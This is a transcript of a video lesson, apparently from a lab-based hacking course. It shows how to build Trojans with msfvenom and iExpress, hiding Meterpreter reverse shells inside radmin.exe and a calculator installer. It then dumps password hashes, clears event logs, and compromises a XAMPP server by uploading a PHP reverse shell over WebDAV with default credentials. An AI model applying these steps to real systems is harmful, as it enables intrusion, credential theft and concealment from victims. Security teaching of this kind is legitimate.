In this lesson, we're going to talk about how to create Trojans to be able to send over to machines and compromise them by using Metasploit in this case again. Now, when it comes to the Trojans and viruses and worms and all that kind of stuff, sometimes people get confused by it. But usually what I'll ask students is I'll say, hey, do people want Trojans? And of course, most people will say no. But in actuality, the answer is yes. Because in order for them to actually take advantage of a Trojan, it's because they've downloaded something intentionally. So whether it may be an illegal movie that they're downloading off a file share program or whatever it may be, they're downloading the product. Now, I've attached something nice to it, nice in my opinion, that they may not be aware of, called a Trojan. So essentially, they downloaded it off their own free will, thinking it's just a movie that they've downloaded, a rip pirated movie or whatever, and they're actually going ahead and going to take advantage of this and watch and do whatever, but they don't realize in the background there's something running called a Trojan, which is our virus. And this is pretty prominent in this day and age here, especially when it comes to all these downloads that people do. And back in the day when keygen programs used to be really popular, there was a ton of Trojans on every one of, I would say probably about 98% of those keygen programs there for generating keys for games and stuff. I think most of those were Trojan more than likely. Now, when it comes in this day and age here of cybercrime and things like that, Trojans are something that can't self-replicate by itself. It's just something that's attached to a file, so you need a host to be able to attach it to it. So it's a little bit different than the virus, where you would send the virus and they would just need the virus and they would just click on it and run it. But this one is an actual, attachment to a particular program. So the difference between that and a worm is a worm will self-replicate. A good example of a worm would be Stuxnet. Stuxnet was something that happened back in the day for Iran's nuclear facility plant, where somebody had taken a worm and planted it on the machines there at the Iran nuclear facility plant. And what it basically would do is it would self-propagate itself throughout the network, because it can propagate without help and go throughout the network, as long as they're all connected computers to the network. And it basically was going in there and rewriting some software code and changing how the gears are being used to enrich uranium and things like that, the centrifuges. And it basically screwed with those enough to where it brought it down and put them or set them back a number of years. And it was all based off of one particular worm that was able to self-replicate throughout an entire network. So pretty dangerous stuff. Now, when it comes to Trojans, there's a few different ways you can do it. There's some old programs. I don't like to focus on that sort of thing because a lot of these programs are archaic, like ProRat and Dark Comet Rat and all these other ones. And when I say rat, I mean remote access Trojan. They're old programs that are usually, in a signature file for an antivirus. So I typically don't like to use those. I like to create my own and modify it to my own will. In this case here, the idea of doing the Trojan or creating the virus in this case here is there's a couple ways we're going to do it. One is we'll do it within Metasploit itself using the different tools that are there from Interpreter. And then one, we'll try to go ahead and trick by having Microsoft allow me to create it with a program they have themselves. So I'm going to actually use Microsoft's programs and operating system against them. That's the goal. We'll see how well we fare. All right, so one of the first ones we'll do is we're going to create a virus again. So if you watched any of the other videos, you'll know how we created these viruses here. So I'm going to rerun this last one here, and I'm going to modify it a bit. So on this one here, first off, I'm going to find a legitimate executable. So there's a legitimate Windows binary called radmin.exe. Let me find it. And I'm going to grab this path. Whoops. There we go. I'm going to grab that path there. So we're going to keep most of the same stuff that we have on here. The only thing we're going to change is after the L port, before the -F, I'm going to add something else to this. I'm going to add a -X, which is basically to embed an actual legitimate file into the virus itself. So I'm going to paste in radmin.exe. So again, we're starting off with MSF Venom -P for payload. Our payload is Interpreter. The local host is this attacking machine. The local port we're going for is 443. And we can change that up too. I'll change it up this time. We won't use the same port every single time. I'll just do, I don't know, 1, 2, 3, 4, 5, whatever. Doesn't really matter. Okay, executable. So from there, if I were to just keep it as that, that would work. But the only problem is it may crash the actual program itself, which would be definitely not a good thing, because the idea of a Trojan or a virus is to make sure the user is not aware that this stuff is happening behind the scenes. So we want to make sure it doesn't crash the program. So we want it to run in its own thread, and we can use -K to allow that to happen. So that's another switch you can add to MSF Venom in the payload itself. Now we are still going to keep the -F executable because the format is an executable. And let's see here. We already called the first one Chuck, so we'll call the next one Wingnut. Sounds good. And we'll hit enter. And we'll come back here while waiting on that and change something back here on our interpreter. So in this case here, as you recall, we had done this in a previous video, is that we had set the payloads here, local host, local port. Now I just changed the local port of my payload to 1, 2, 3, 4, 5 to make it a different payload itself. So what we're going to do here is I'm going to change the L port on this one to the 1, 2, 3, 4, 5 that I had just done. The same old host is there. Everything's good. The interpreter is still the same. Nothing's changed there. Okay. So, oops. And I just did a dumb thing. I actually exited out instead of typing an exploit. I was trying to type an exploit, but I actually exited out of that, but that's all right. We'll bring up our console again and tear it up. So here we can see that we got our payload all ready to go. So while I'm waiting on the console to come up, I'm going to come over here to our domain controller. And let's go ahead and bring up our browser here. And 10.0.0.1, oops, 100/wingnut.exe. Actually, you know what? Yeah, okay. What you would want to do, actually, instead of calling it something stupid like that, is call it what it is, radmin, right? radmin.exe. So that's all right. So I'll save it right now to here. Okay. And before I run it, let me come back over here. And because I exited out of this last Metasploit deal here, I'm going to have to go ahead and set this back up. So multi-handler is what I'm going to be using here. And I'm going to set the payload as the Windows interpreter one that we did. So set payload Windows/interpreter/reverse_TCP. And then what I'll do is I'll set my local host again. That's 10.0.0.100. And then we'll set our local port 1, 2, 3, 4, 5 as we did for our virus. And this time I'll type in the word exploit. There we go. And now we're flying. So back over here, let's go ahead and run our program. So you can see by running the program, it actually brings up a legitimate executable called our admin viewer. So this is an actual legitimate executable, and you'll see here as well that over on Linux, it actually gave us an interpreter prompt. See that? Get UID, Chuck administrator, get system, get UID, NT authority, and all that jazz. So just like the last video we talked about how we compromised the system, we have just compromised it again with a Trojan, okay, with a particular virus in this case here. So the Trojan aspect of it is in the form of a legitimate executable, okay? So do keep that in mind, that that is one way that you can do it. Now, another one that's interesting as well, that I know for particular cases, this application one doesn't work for some reason for Calculator on 2012, but I know it does on Windows 7, but that's okay. We're going to go ahead and show you anyways how we can do this. There's actually a Trojan creator in Windows. Every Windows operating system that I've ever seen actually has this program. So I know Microsoft probably didn't create this with the intent of it being a Trojan creator, but I'm going to use it as such. It's called iExpress. It's a pretty sweet little tool. So if you look up iExpress in any of your Windows operating systems, you should be able to find a version of it there. So what I'm going to do here is We're going to make a new self-extract and directive file. I'm going to keep this first one here as extract files and run the installation command. And we're going to pretend our scenario here is that we have an accounting department and they're in need of a super duper calculator. So we're going to call this one SuperCalc. Okay. And I'm going to use the calculator that's here on Windows, but keep in mind this won't actually bring up the calculator for some reason. It will still run the virus, but it will work on Windows 7. I'm not really sure why it doesn't bring up the executable on 2012, but either way, the same effect still applies. So here we can see confirmation prompt. Now keep in mind, again, this is a Trojan. We don't want the end user to know something bad is happening. So we don't want to alert them to anything. So we say no prompt. We don't want to display any license. Then we want them to actually run calculator, let's say. So I'm going to go to, let's see, C, Windows. We're going to grab the calculator that's here on Windows. Seems I don't have one, so we'll just use theirs. All right, so System32, I think it's called Calc. There it is right there. Okay, calc.exe. And open. So we got one file in there, but check this out. I can add another one in, such as my Chuck virus. Pretty awesome, huh? I tell you, man, Microsoft is definitely hooking us up here. So we got two of them there. Let's go next. Now, when they actually run it, I want the program to run. Now, again, in Server 2012, it doesn't bring up calculator for some reason. I haven't tried it with another executable, but in Windows 7, I did it with no problem, and other operating systems, I haven't had any problem either. It just seems to be in Server it does it. But anyways, I want them to run calculator. So I don't want them to be anything suspicious. But when they close it, run Chuck. Check that out, huh? That's super awesome. So we got the install program. This is basically just going to run the program, and then when I close it, it's going to run my Trojan, my virus. So we definitely want to keep it hidden. We don't want the bad guy, or we don't want the victim to know anything's going on. No message. Let's drop it on the desktop here for a minute. So I'll go ahead and call it SuperCalc right here on the top. Now we definitely want to hide the file extraction of progress animation because they would say, what is going on? Extracting a virus. No restart. Don't want any of that business. Don't save. And finish. All right, super awesome. Let's go back over here real quick. Now, let me modify this because the Chuck one was using the 443 port. So I'm going to run my exploit again. All right, let's go back over here to Windows now. So yeah, on our desktop, we should now see, SuperCalc. Now, a good administrator is going to look for some sort of digital signature from a legit company. So if it just looked at the properties and saw like Apache, whatever, it's going to say, no, this is not legitimate. But check this out. Look who digitally signed our Trojan. Super awesome, man. Digging it. I sure am. So it looks like Microsoft Corporation has signed our Trojan for us. So that's pretty awesome stuff. Click OK there. So I'm going to run it, and obviously it's not going to bring up the calculator, but in Windows 7 you would see calculator pop up right here. But you can see basically nothing going on, right? So even if nothing did go on, and they went ahead and reported to help desk, it doesn't matter because by the time they actually leave their chair to go find help desk, we already have an interpreter over here. Get UID, Chuck administrator, get system, boom, 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 pop, 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 another server drop, run hash dump, bada bing, bada boom, get all the credentials, clear the event logs, and exit out of there. So by the time they get back from showing the guys that created the software saying, hey, man, your calculator doesn't work. It doesn't matter. We've already pwned the box. Life is good, and we're walking away with smiles on our faces. So that basically is a way that you can use it to create Trojans and viruses in your environment. Pretty awesome stuff for sure. So let me close out of this exit of this one here. All right, there we go. Very cool. All right, so that's an example of how you can use it to create Trojans in your environment. Now we're going to use a few other different uses, but for this I need to bring up another lab environment that's different than this one. So what I'm going to do is, again, pause the video real quick, bring up a different lab environment. When we get back, I'm going to show you how you can utilize this against web servers as well with this whole Meterpreter Metasploit thing. How you guys liking this Meterpreter Metasploit? It's pretty awesome, isn't it? So when we get back from pausing this real quick, we'll bring up a different lab environment, and we'll go ahead and try to compromise a web server for its purposes with Meterpreter. All right, so I brought up a XP file or XP machine because I was running XAMPP on it already. So I decided to just bring that one up because it's a low process and it doesn't take up much RAM on my machine here. So I'm just going to use that, and it's just hosting basically XAMPP, which stands for Apache, MySQL, and PHP. And it's an all one-stop shop way to make your own little web server. And it's free. You can download it. This one here is the one specifically for Windows. There's another one called LAMP for Linux, which does the same type of thing. Apache, MySQL, and PHP. So I'm basically running a web server with these things here. And we're going to try to compromise. And as you can see over here on Kali Linux, I'm able to go ahead and connect to that page. Okay, so 10.0.105, which is the XP machine, and I can clearly see here it's running XAMPP. So now that I know that, let me minimize this here. Some things we're going to do here is we're going to test out a few things such as default credentials. Now, default credentials in servers like this can be a real problem because it utilizes, in this particular case, something called WebDAV for XAMPP. And if you're using this tool called Cadaver, it's kind of like doing an FTP. It's like I want to put files up on my web server. I would use Cadaver, and I would use the put command to be able to do that. But to connect to, using Cadaver, connect to the WebDAV, you actually have to put in credentials for it. Now, if a person doesn't really know that you should change those credentials, and they just kind of keep it at the default's going to be username of XAMPP. It's the other way. The username is WAMPP, and the password should be XAMPP. So we're going to test that and see if that's the case. By the way, it is because I made it that way purposely. But we're going to test it as a scenario to see if that's actually the case here. So first thing we want to do is we want to see if we can upload anything text file-wise to the guy's web server. So this is the victim's web server. So what we're going to do is I'm going to make a file. I'm going to use a command line text editor. So we'll go ahead and call this one test.txt, and I'll say this is a test of the Roundhouse Kick Network. Control X, Y, and enter to save it. So I have words in there, and I want to see if I can actually upload this bad boy here. So I'm going to use a tool called Cadaver. And we're going to connect specifically to 10.0.105/webDAV, and it's going to ask me for credentials. Now, again, I don't know what the credentials are, but I'm going to hope and assume that they're using default credentials. So WAMPP, username, XAMPP for the actual password. And look at that. Surprise, surprise, they are using default credentials. So in this case, we're now in WebDAV. So from here, we can actually go ahead and try to put that text file in there. So I can say put test.txt, and I can see 100% success that it worked. So now if I were to come here to my browser, and we go to webdav/test.txt, you can see it says this is a test of the Roundhouse Kick Network. So we know that that works, and it allows me to upload stuff to this guy's web page. Well, seeing as we know that can happen, how about we try to see if we can upload a PHP file? PHP is to give interactivity in a web page. It's a scripting language specifically designed for web-based and for having dynamic pages. So in this case, I'm going to go ahead and make a new one. I'm just going to say touch test.php. I don't know how to code in PHP, so I'm just going to leave it be. I just want to see if it allows the extension of .php, because if it does, well, then that's going to be beneficial to us from the standpoint of Meterpreter. So let's go back over here and try to put test.php, and look at that. It uploaded it with no problems, so we now know that the web server not only has default credentials, but they also allow you to upload PHP. Okay. Now, in this case, if you recall earlier, we did an MSF Venom, and we made a payload using Meterpreter reverse TCP. Okay. Now, in this particular case here, what we want to do is we want to do the same type of thing, but this time we want to make a PHP payload. So let's go over here, and we'll use our MSF Venom again. And for this one here, we're going to give it a payload of PHP, not Windows, PHP Meterpreter / reverse _ TCP. And we'll go with our lhost equals 10.0.0.100, which is this machine. And then we'll say lport equals, and we'll just pick some more random ones. 2323 sounds good. -F, and we'll make it a raw packet instead of executable, meaning just the raw PHP is what I want from this. I'm going to go ahead and call it meta.php here. And I think what we'll do, yeah, we'll do that. We'll call it meta.php, and we'll save it here. Okay, while that's coming up, let's come back over here to our MSF, and we're going to make a new multi-handler. Actually, we already have a multi-handler, so let's go ahead and change the payload. So we'll say set payload, because the previous one was Windows. We're going to do PHP / Meterpreter / reverse _ TCP. And because we've done that, we now need to set the actual options. And we can see there's the lhost. That's correct. But the L port was different. 2323 is what we did. So I think we're good there. Let's exploit that. Okay. So all we did basically here is we did a PHP Meterpreter reverse TCP, and then we changed the port number just to kind of be random in this case here, just to keep you on your toes. All right. So now that we got that rocking and rolling, let's see, make sure that we actually have it. Now let's go ahead and upload. So put meta.php. Okay, so you can see right there that the WebDAV allowed us to go ahead and upload our little PHP script. We're going to keep it on this payload handler. I'm going to bring up the browser. And let's go to WebDAV / meta.php. And you'll notice it says, it just hangs there. You notice it keeps saying connected. So let's come back here real quick. And look at that. Meterpreter, pop, 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 another server drop. And then we'll go to our PS, find out things there. Do a sysinfo, find out that we're in with PHP. Now this one's a little different than the Windows one. It doesn't have as many cool things, okay? But you can still get shell access, and you can do execution of commands and killing processes and all that kind of cool stuff. So it's not as full featured as the Windows one, but it still gives you quite a few things. So from here, you can type in shell. Okay, now you're in the Apache. Now keep in mind, a lot of times people will install their web servers and run them on machines that they've logged into as admin. If that's the case, so will the web server. The web server will also be admin. In this case here, I don't believe that I had logged in as admin, so I don't think I'm actually admin in this case here. But either way, hopefully they are. That's what you would hope. But in this case here, this is how you would actually use this to your advantage. You would use it to compromise a system and actually browse to it. Okay? So pretty awesome stuff. You're browsing right to breaking into the guy's machine right from his own web page. How awesome is that? So that's kind of how you would actually go ahead and use this. And looks like this is hanging up a bit, but that's all right. For Meterpreter and Metasploit. I'm going to go ahead and close out of this window so we can close out of that session there. And then we'll exit on Meterpreter here. Awesome. All right, very cool. So that's basically how you would actually use Meterpreter to your advantage. We're going to talk a little bit more about some post-exploitation stuff as well on another module. But for this module, this is kind of a beginner level to let you know how to use Meterpreter to your advantage to create things like Trojans and viruses and to use them to compromise web servers and like. So I hope you enjoyed the video.